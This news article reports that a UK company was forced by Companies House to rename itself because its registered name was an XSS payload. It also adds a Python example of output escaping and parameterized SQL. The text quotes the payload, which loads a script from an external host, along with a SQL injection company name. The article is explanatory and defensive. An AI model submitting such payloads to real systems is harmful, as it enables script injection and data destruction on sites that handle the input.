
Great Britain: Company name prohibited due to security vulnerability

Last updated on March 9, 2021


A British company had to change its company name because the name could inject code into websites.


The British authority Companies House, which is responsible for the local commercial register, has forced a company to change its name because the name may pose a security risk. The company name consisted of HTML code structured like a classic cross-site scripting (XSS) attack, which could allow the execution of JavaScript code in the context of a website – including the website of the British authority.



The company founder told the British newspaper Guardian that he did not choose the company name to attack the Companies House website, but rather thought it was “a funny, playful name” for his consulting firm. However, that is hard to imagine given the original company name:

"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD

If this HTML code (the company name is nothing else) is not properly validated and is output inside an HTML element of a web page, a script from the URL in the company name is executed in the context of that page. The Guardian writes that the stored script only displayed a harmless warning. However, it could have been used for attacks at a later time.

Now the company has been renamed to “That Company whose Name used to contain HTML Script Tags LTD”. It is not the first time that a company name has contained code: the company name “; DROP TABLE "COMPANIES";-- LTD”, for example, is meant to delete contents of the database using an SQL command. However, according to the Guardian, the companies were not forced to change their names. Instead of the name, the Companies House website simply displays “Name of company available on request”, the Guardian reports.
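The two defences these names probe, shown as an added example that is not part of the original article: escaping on output for the HTML case and parameterized statements for the SQL case. The two names are the ones quoted above, written with straight quotes; the `<input>` template, the function names and the in-memory SQLite table are assumptions made for illustration.

```python
import html
import sqlite3
from html.parser import HTMLParser

# Company names quoted in the article, used here as test input.
XSS_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD'
SQL_NAME = '; DROP TABLE "COMPANIES";-- LTD'


class TagCollector(HTMLParser):
    """Records each element (and its attributes) that an HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, dict(attrs)))


def parse_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.seen


def render_unsafe(name):
    # Vulnerable: the name is concatenated into the attribute value as-is,
    # so its leading quote and bracket end the attribute and the tag.
    return '<input name="company" value="' + name + '">'


def render_safe(name):
    # Hardened: &, <, > and both quote characters are emitted as entities.
    return '<input name="company" value="' + html.escape(name, quote=True) + '">'


def store_and_load(names):
    # Parameterized statements pass the name as data, never as SQL text.
    db = sqlite3.connect(":memory:")
    db.execute('CREATE TABLE "COMPANIES" (name TEXT NOT NULL)')
    db.executemany('INSERT INTO "COMPANIES" (name) VALUES (?)', [(n,) for n in names])
    rows = db.execute('SELECT name FROM "COMPANIES" ORDER BY rowid').fetchall()
    db.close()
    return [row[0] for row in rows]


if __name__ == "__main__":
    print([tag for tag, _ in parse_tags(render_unsafe(XSS_NAME))])
    print([tag for tag, _ in parse_tags(render_safe(XSS_NAME))])
    print(store_and_load([XSS_NAME, SQL_NAME]))
```

With escaping, the parser sees a single `input` element whose value decodes back to the exact registered name, so nothing about the name has to be rejected or altered in storage.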

Source: golem.de
